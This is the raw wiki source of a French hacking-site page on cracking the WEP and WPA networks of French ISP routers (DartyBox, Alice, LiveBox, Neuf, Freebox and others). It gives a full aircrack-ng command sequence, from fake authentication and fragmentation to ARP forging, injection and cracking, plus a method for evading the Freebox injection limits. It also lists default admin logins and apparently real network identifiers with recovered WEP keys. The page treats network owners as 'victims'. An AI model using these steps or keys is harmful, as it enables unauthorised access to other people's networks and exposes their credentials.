Pork Center
Voir le texte source
Page
Discussion
Voir le texte source
Historique
Rechercher
Navigation
Accueil
Communauté
Modifications récentes
Page au hasard
Chat
Aide
sitesupport
Outils personnels
3.145.143.239
Discussion avec cette adresse IP
Connexion
Boîte à outils
Pages liées
Suivi des pages liées
Pages spéciales
Voir le texte source
De Hack-it.org.
pour
Réseaux cryptés (WEP et WPA)
==Dartybox== * Nombre de test : bcp. ===Modes par défaut=== * Channel <b>3</b> (peut varier) ====Ancienne version==== * Encryption : <b>WEP</b> * ESSID : DartyBox_<i>xxxx</i> (chiffres et lettres minuscules) * BSSID : 00:1D:6A:<i>YY</i>:<i>YY</i>:<i>YY</i> <pre> DartyBox_af0a 00:1D:6A:14:71:5D DartyBox_9b0a 00:1D:6A:26:98:5E DartyBox_2ee0 00:1D:6A:2A:72:A6 </pre> ====Nouvelle version==== * Encryption : <b>WEP et WPA</b> * Filtrage mac : <b>non</b> * ESSID : DartyBox_XXXX_WEP et DartyBox_XXXX * BSSID : 00:1D:19:YY:YY:YY (le même pour les deux !) * Clé WEP : elle a une correspondance ASCII de 13 caracteres (chiffres et lettres majuscules mélangés) <pre> 52585546364B434656464E5355 RXUF6KCFVFNSU 48503934464C4636415A395955 HP94FLF6AZ9YU DartyBox_B357 00:1D:19:F3:01:68 DartyBox_4C0B 00:1D:19:59:B9:70 </pre> ===Mode Opératoire=== Facile a péter, même quand il n'y a aucun client connecté en wifi.<br> L'AP émet régulièrement des paquet (surtout quand il y a du monde sur le réseau local filaire), il suffit de : * Lancer le <b>monitoring</b><br> <i>airodump-ng wlan0 -c 3 -t wep -w meme</i> BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 06:1D:19:XX:XX:XX 24 34 2412 18 0 3 54. WEP WEP OPN DartyBox_XXXX_WEP * Faire une <b>fakeauth</b><br> <i>aireplay-ng wlan0 -1 1000 -o 1 -q 10 -e DartyBox_XXXX_WEP -h 00:11:22:33:44:55</i> * Réinjecter ces paquet à coup de <b>fragmentation</b> (attaque n°5 de aireplay). Still nothing, quitting with 384 bytes? [y/n] y Saving keystream in fragment-1201-004730.xor <i>aireplay-ng wlan0 -5 -r meme-01.cap -e DartyBox_XXXX_WEP -h 00:11:22:33:44:55></i><br> et essayer tous les paquets les uns après les autres (il passe automatiquement au suivant). Même si on ne choppe que 384 bytes de keystream, ca suffit. * On récupére le fragment qu'on fout dans <b>packet forge</b> pour obtenir un arp : <i>packetforge-ng --arp -y fragment-XXXX-XXXXXX.xor -a 06:1D:19:XX:XX:XX -h 00:11:22:33:44:55 -k 192.168.1.1 -l 192.168.1.2 -w darty</i> * Puis on <b>injecte</b> notre paquet fraichement forgé :<br> <i>aireplay-ng wlan0 -3 -r darty -e DartyBox_XXXX_WEP -h 00:11:22:33:44:55</i> * Et roule ma poule !<br> <i>aicrack -c meme*.cap</i> (on utilise l'option -c car les clés dartybox sont alphanumériques)<br> Ya plus qu'à aller se préparer un gros tajin en attendant. ===Interface routeur=== * ?192.168.1.100? ancienne version ? * http://192.168.1.254/ login / pass : DBAdmin / dbox1234 (user : DartyBox/1234) ==Alice== ===Paramètres par défaut=== * Channel <b>11</b> * Encryption : WEP sur les anciennes, WPA sur les nouvelles * Clé WEP : longueur de 13 chars hexa * Anciens AP :<br> -v1 ESSID : Alice-<i>xxxx</i> (chiffres, et lettres en minuscules)<br> ssid de forme 00:0F:A3:A<i>Y</i>:<i>YY</i>:<i>YY</i> ou 00:16:41:<i>YY</i>:<i>YY</i>:<i>YY</i><br> -v2 ESSID : ALICE-XXXXXX (chiffres, et lettres majuscules)<br> ssid de forme 00:03:C9:<i>YY</i>:<i>YY</i>:<i>YY</i> ou 00:16:38:<i>YY</i>:<i>YY</i>:<i>YY</i><br> <pre> Alice-b401 00:0F:A3:AD:C8:BD WEP 11 Alice-d183 00:16:41:F0:68:1D Alice-6e9c:00:0F:A3:AE:78:D7 Alice-6c3d:00:16:41:4E:32:67 Alice-b43b 00:16:41:8E:E5:D9 Alice-5369 00:0F:A3:AD:F9:0F Alice-6e9c 00:0F:A3:AE:78:D7 ALICE-C8823C:00:03:C9:D2:E0:81 WEP 11 ALICE-DA5386 00:03:C9:AC:86:6F ALICE-C8823C 00:03:C9:D2:E0:81 ALICE-2E9A7D 00:16:38:2E:9A:88 ALICE-197AAE 00:03:C9:19:7A:B9 ALICE-931425 00:16:38:93:14:30 </pre> * Nouveaux AP :<br> ALICE-LAN-<i>XXXXXX</i> pour les nouvelles (chiffres, et lettres en majuscules)<br> 00:1D:8B:5<i>Y</i>:<i>YY</i>:<i>YA</i< et 00:1D:8B:5<i>Y:<i>YY</i>:<i>YB</i> (la premiere est l'ap visible, la deuxième a un essid de 19 caractères héxadécimaux, <i>a</i> correspond au caractere qui suit <i>b</i>) <pre> ALICE-LAN-94E4F5 00:1D:8B:56:25:9C WPA 11, TKIP,PSK 00:1D:8B:56:25:9D WPA 11, TKIP,PSK ALICE-LAN-4BF64A 00:1D:8B:5E:4C:B8 00:1D:8B:5E:4C:B9 </pre> * Filtrage mac : <b>OUI !</b> ===Interface du routeur=== * http://192.168.1.1 alice/alice ==LiveBox== ===Modes par defaut=== * Channel <b>10</b> * Encryption : WEP (pour les anciennes), WPA (pour les nouvelles) * ESSID : Livebox-xxxx (chiffres, et lettres en minuscules)<br> * Clé WEP : longueur de 13 chars hexa <pre> aucun rapport entre le essib et le bssid wpa : 00:1A:6B:C1:30:61 00:16:41:D0:7C:A4 00:1E:37:ED:D9:51<br> wep : 00:16:41:D0:72:71 00:16:41:4E:82:9E 00:16:41:8C:9D:C5 </pre> * Filtrage mac : <b>OUI !</b> <pre> Macs cheulous : BSSID = 00:16:41:D0:72:71 00:19:4B:4B:A6:99 (source) > 01:00:5E:7F:FF:FA (dest) > 01:00:5E:00:00:01 BSSID = 00:16:41:4E:82:9E 00:1E:74:ED:37:B8 > 01:00:5E:00:00:01 > 01:00:5E:7F:FF:FA 00:18:F3:57:E4:7D > 01:00:5E:00:00:FB > FF:FF:FF:FF:FF:FF BSSID = 00:16:41:8C:9D:C5 00:15:56:96:70:9A > 01:00:5E:7F:FF:FA > 01:00:5E:00:00:01 </pre> ===BBOX=== Les clefs WEP/WPA par défaut sont générées en fonction du nom de l'AP. * http://bbkeys.p4ul.info/? ==NEUF== * Channel 11 * Encryption : WEP (vieux) ou WPA (récents) * Clés WEP : 13 caractères ascii (que des lettres) * AP récents :<br> NEUF_XXXA (majuscules et chiffres)<br> 00:17:33:ZZ:XX:XB (B est le caractère qui suit A)<br> Encryption WPA, Filtrage MAC<br> Si Neuf wifi est activé, le routeur emettra l'ap suivant :<br> "Neuf WiFi" 00:17:33:ZZ:XX:XC OPN<br> <pre> NEUF_B0D0 00:17:33:5E:B0:D1 00:17:33:5E:B0:D2 NEUF_BE0829 00:17:33:96:BE:09 00:17:33:96:BE:10 </pre> <pre> Cle Wep (essid, bssid, key hexa, key ascii) NEUF_BE00 00:17:33:37:BE:01 66:6C:61:72:68:6F:75:63:6B:65:64:67:61 flarhouckedga NEUF_9B24 00:17:33:34:9B:25 6C:75:6E:66:69:6C:67:6F:64:79:6F:79:73 lunfilgodyoys </pre> ==Freebox== La freebox est le routeur qui est le plus souvent "personnalisé".<br> (au niveau du nom d'essid, du filtrage mac, l'encryption, le channel, la clé...)<br> Clé configurée par l'utilisateur final dit bien souvent passphrase petable à coup de dico (point intéressant, les utilisateurs foutent souvent un <b>numéro de téléphone</b> comme passphrase)<br> Elles sont facile à reconnaitre en raison de leur bssid exotique (c'est le seul qui ne commence pas par 00) et du nombre d'ap que le routeur émet. ===Mode par défaut=== * channel : 1 ? * Clé : WEP + WPA (+ WPA2 sur les dernières) * Filtrage mac : yes * <b>Protection contre l'injection de masse</b> * Clé WEP par défaut : 5 caractères hexa (correspondant bien souvent, et autant de fois ce n'est pas un hasard, à des caractères ISO aléatoires - genre chiffres, lettres, virgules, accents, diez...) * BSSID et ESSID Une freebox émet systématiquement 4 AP : - <i>XX:XX:XX:XX:XX:XA</i> : freebox (par défaut), l'AP qui établit la connection internet avec les ordi (c'est celui là qu'il faut péter)<br> - <i>XX:XX:XX:XX:XX:XB</i> : un ap exotique, sûrement destiné à accueillir la tv par wifi<br> - <i>XX:XX:XX:XX:XX:XC</i> : comme son copain du dessus<br> - <i>XX:XX:XX:XX:XX:XD</i> : freephonie, un ap probablement dédié a la voip par wifi<br> <pre> 16:94:EF:F8:F6:53 13 54 WPA TKIP MGT freephonie 16:94:EF:F8:F6:52 13 54 WPA2 CCMP PSK <length: 0> 16:94:EF:F8:F6:51 13 54 WPA2 CCMP PSK <length: 0> 16:94:EF:F8:F6:50 13 54 WEP WEP freebox BE:2D:8B:C3:2C:8E 13 54 WPA2 CCMP PSK <length: 0> BE:2D:8B:C3:2C:8F 13 54 WPA TKIP MGT freephonie BE:2D:8B:C3:2C:8D 13 54 WPA2 CCMP PSK <length: 0> BE:2D:8B:C3:2C:8C 13 54 WPA CCMP PSK 0i0come0com0 46:8A:5D:33:2F:5E 2 54 WPA2 CCMP PSK <length: 0> 46:8A:5D:33:2F:5F 2 54 WPA TKIP MGT freephonie 46:8A:5D:33:2F:5D 2 54 WPA2 CCMP PSK <length: 0> 46:8A:5D:33:2F:5C 2 54 WPA CCMP PSK ZanReno 92:CB:0C:3D:A0:2C 1 54 WEP WEP guiclaire 92:CB:0C:3D:A0:2D 1 54 WPA2 CCMP PSK <length: 0> 92:CB:0C:3D:A0:2E 1 54 WPA2 CCMP PSK <length: 0> 92:CB:0C:3D:A0:2F 1 54 WPA TKIP MGT freephonie </pre> ===Interface=== L'interface de la freebox est la mieux protégée.<br> Ici, impossible de toucher quoi que ce soit : l'interface n'est modifiable que sur internet via son "espace client" sur free.fr ; la nouvelle configuration est récupérée par le routeur freebox directement le site de free au redémarrage de ce dernier.<br> Si il y a le filtrage mac, on est condamné à toujours utiliser la mac de la victime pour pouvoir utiliser la connection (quel grand désarroi...) ===Péter une freebox=== La freebox est bien la seule box en France à disposer d'une protection contre l'injection.<br> Même si la clé est en WEP, vous risquez d'en chier.<br> <br> En fait, cette protection contre l'injection est surtout pénalisante au niveau de la réinjection d'ARP, mais peut s'activer aussi lors des autres attaques, qui nous permettront de générer notre arp.<br> Elle agit apparemment de la façon suivante : lorsque vous sollicitez trop le routeur à la recherche d'ARP, ce dernier vous désauthentifie, et arrête de vous envoyer des arp.<br> Il faut alors attendre une minute pour recommencer l'injection<br> La solution ?<br> Elle est en fait très simple : lors de vos attaques, vous rajoutez le paramètre <b>-X <NUMBER></b> qui définira le nombre de paquet à la seconde que vous allez balancer. Plus le routeur est loin de vous, plus ce nombre devra être grand (à cause du nombre de paquets perdus dans l'espace).<br> Un <b>-X 30</b> est en général pas mal. Pour trouver votre vitesse idéale, commencez tout d'abord petit (-X 1, ou -X 5) et augmentez progressivement le facteur jusqu'à ce que la freebox arrête de arrête de répondre à votre paquet. Uitilisez ensuite le dernier "facteur stable" que vous ayez dégotter (il faut procéder à une sorte de dichotomie pour trouver le facteur idéal).<br>br> Une fois qu'on a découvert un facteur convenable (ou pas) qui sollicite le routeur sans le "bloquer", il n'y a plus qu'à préparer une bonne grosse soupe de légumes frais.<br> Parce qu'avec 10 arp par secondes, vous aurez le temps d'en éplucher, des patates.<br> (ceci dit, avec la longueur généralement faible des clés freebox, ca ne dépassera surement pas une heure, voire 15mn) <br><br><br> Une technique subsidiaire qui marchait sur les anciennes freebox (ou les anciens firmware ?) consistait à balancer 300 paquet par seconde à l'AP, celui-ci mettait en effait une minute à se bloquer, ce qui présageait ~ 5000 paquets à récupérer avant d'attendre que l'ap ne se débloque à nouveau. Une technique bien pourrie, qui obligeait à rester en permanence sur airodump pour relancer la machine aircrack toutes les 5mn en vérifiant que ca marchait bien à chaque fois. Cette méthode semble apparemment ne plus être d'actualité, les routeurs freebox étant désormais bridés en nombre en envoi d'arp même si il ne sont pas sur la "défensive". ==SFR Neuf Box== ===Paramètres par défaut=== * L/P du routeur : login : admin pass : clé WPA par défaut et inscrite sous le routeur. ==Les autres AP== TECOM SFR SpeedTouch Wanadoo <pre> N9UF_TEL9COM 00:16:CE:50:69:1C 8 WEP Wanadoo_6b4c 00:03:C9:63:13:D4 10 WEP Wanadoo_a901 00:10:C6:EB:6C:64 10 WEP Wanadoo_7841 00:03:C9:63:03:90 10 WEP Wanadoo_fbac 00:03:C9:55:4C:68 10 WEP Wanadoo_85c1 00:16:41:03:92:BA Wanadoo_210a 00:03:C9:BD:A6:36 Wanadoo_6e25 00:10:C6:EB:7C:CF Wanadoo_210a 00:03:C9:BD:A6:36 Wanadoo_fb3d 00:10:C6:CB:3A:45 Wanadoo_b581 00:03:C9:7B:B1:41 Wanadoo_d6c9 00:16:41:4F:CB:2D Wanadoo_3851 00:16:41:0C:3E:88 Wanadoo_f009 00:10:C6:C9:9A:7B WANADOO-9C5B 00:14:A4:43:DF:70 1 WPA WANADOO-F3AC 00:14:A4:52:34:A6 10 WEP WANADOO-CC08 00:16:CE:21:76:BD 7 WPA WANADOO-7C50 00:16:CE:15:1E:E8 1 WPA WANADOO-FC08 00:16:CE:2F:11:BC 1 WPA WANADOO-8460 00:0E:9B:C5:04:DC 1 WEP SFR_ADSL_0466D 00:1D:19:6F:5E:CA 13 WEP SFR_ADSL_277A1 00:01:36:16:0A:12 4 WEP SpeedTouchD3DCC4 00:14:7F:B3:7D:E3 6 WEP SpeedTouch98C82F Wanadoo_8b69 00:03:C9:72:35:89 FC:F6:A3:ED:CC:79:34:42:DE:45:55:D5:C5 Livebox-c150 00:1A:6B:E9:56:27 77:E6:5F:4D:A5:A2:59:7A:2A:E4:55:E9:5E </pre>
Revenir à la page
Réseaux cryptés (WEP et WPA)
.